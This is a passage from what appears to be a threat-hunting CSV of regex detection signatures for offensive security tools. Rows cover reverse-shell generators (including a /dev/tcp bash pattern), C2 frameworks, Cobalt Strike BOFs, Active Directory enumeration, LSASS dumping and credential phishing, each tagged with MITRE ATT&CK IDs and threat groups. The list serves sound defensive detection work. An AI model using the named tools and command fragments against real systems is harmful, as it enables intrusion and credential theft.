/dev/tcp/*/*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c.{0,1000}\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57746" 
"*runZeroInc/sshamble*",".{0,1000}runZeroInc\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","57749" "*RuralBishop.csproj*",".{0,1000}RuralBishop\.csproj.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57750" "*RuralBishop.exe*",".{0,1000}RuralBishop\.exe.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57751" "*RuralBishop.sln*",".{0,1000}RuralBishop\.sln.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57752" "*RuralBishop-master*",".{0,1000}RuralBishop\-master.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW 
section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57753" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#email","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57754" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#email","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57755" "*rustbof.cna*",".{0,1000}rustbof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","57756" "*rustcat-3.0.0.zip*",".{0,1000}rustcat\-3\.0\.0\.zip.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","57757" "*rusthound * --zip --ldaps --adcs --old-bloodhound*",".{0,1000}rusthound\s.{0,1000}\s\-\-zip\s\-\-ldaps\s\-\-adcs\s\-\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57774" "*rusthound 
*--domain*",".{0,1000}rusthound\s.{0,1000}\-\-domain.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57775" "*rusthound *--ldapfqdn *",".{0,1000}rusthound\s.{0,1000}\-\-ldapfqdn\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57776" "*rusthound *-ldaps *",".{0,1000}rusthound\s.{0,1000}\-ldaps\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57777" "*rusthound -c *",".{0,1000}rusthound\s\-c\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57778" "*rusthound -d *",".{0,1000}rusthound\s\-d\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD 
Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57779" "*rusthound rusthound linux*",".{0,1000}rusthound\srusthound\slinux.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","#linux","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57780" "*rusthound rusthound windows*",".{0,1000}rusthound\srusthound\swindows.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57781" "*rusthound* --adcs --dc-only*",".{0,1000}rusthound.{0,1000}\s\-\-adcs\s\-\-dc\-only.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57782" "*rusthound.exe*",".{0,1000}rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57783" "*RustHound-main*",".{0,1000}RustHound\-main.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - 
TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57784" "*RustPotato.exe*",".{0,1000}RustPotato\.exe.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","57785" "*rvazarkar/GMSAPasswordReader*",".{0,1000}rvazarkar\/GMSAPasswordReader.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","57790" "*RVLextu9ni633iqW54ktzkU4kTDgekRFY8ao9gSwM78=*",".{0,1000}RVLextu9ni633iqW54ktzkU4kTDgekRFY8ao9gSwM78\=.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#base64","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","57791" "*Rvn0xsy/Cooolis-ms*",".{0,1000}Rvn0xsy\/Cooolis\-ms.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload 
Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","57792" "*rvrsh3ll/BOF_Collection*",".{0,1000}rvrsh3ll\/BOF_Collection.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","57793" "*rvrsh3ll/Rubeus-Rundll32*",".{0,1000}rvrsh3ll\/Rubeus\-Rundll32.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","57794" "*rvrsh3ll/SharpCOM*",".{0,1000}rvrsh3ll\/SharpCOM.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","57795" "*rvrsh3ll/SharpEdge*",".{0,1000}rvrsh3ll\/SharpEdge.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on 
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","57796" "*rvrsh3ll/SharpSSDP*",".{0,1000}rvrsh3ll\/SharpSSDP.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","57797" "*rvrsh3ll/TokenTactics*",".{0,1000}rvrsh3ll\/TokenTactics.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","57798" "*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*",".{0,1000}RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","57799" 
"*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*",".{0,1000}RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","57800" "*rwxfinder.*",".{0,1000}rwxfinder\..{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","57801" "*RWXfinder-main*",".{0,1000}RWXfinder\-main.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API 
functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","57802" "*RXh0ZXJuYWwgQzIgUG9ydA==*",".{0,1000}RXh0ZXJuYWwgQzIgUG9ydA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","57803" "*rxwx/cs-rdll-ipc-example*",".{0,1000}rxwx\/cs\-rdll\-ipc\-example.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","57804" "*ryhanson/phishery*",".{0,1000}ryhanson\/phishery.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. 
Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","57805" "*RythmStick/AMSITrigger*",".{0,1000}RythmStick\/AMSITrigger.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","57806" "*rzte/pdf-exploit*",".{0,1000}rzte\/pdf\-exploit.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","57807" "*'S', 'T', 'A', 'R', 'D', 'U', 'S', 'T', '-', 'E', 'N', 'D'*",".{0,1000}\'S\',\s\'T\',\s\'A\',\s\'R\',\s\'D\',\s\'U\',\s\'S\',\s\'T\',\s\'\-\',\s\'E\',\s\'N\',\s\'D\'.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","57808" 
"*'S','e','D','e','b','u','g','P','r','i','v','i','l','e','g','e'*",".{0,1000}\'S\',\'e\',\'D\',\'e\',\'b\',\'u\',\'g\',\'P\',\'r\',\'i\',\'v\',\'i\',\'l\',\'e\',\'g\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","57809" "*'S','e','l','f','R','e','f','l','e','c','t','i','v','e'*",".{0,1000}\'S\',\'e\',\'l\',\'f\',\'R\',\'e\',\'f\',\'l\',\'e\',\'c\',\'t\',\'i\',\'v\',\'e\'.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","57810" "*s.gServer.connectedClients*",".{0,1000}s\.gServer\.connectedClients.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","57811" 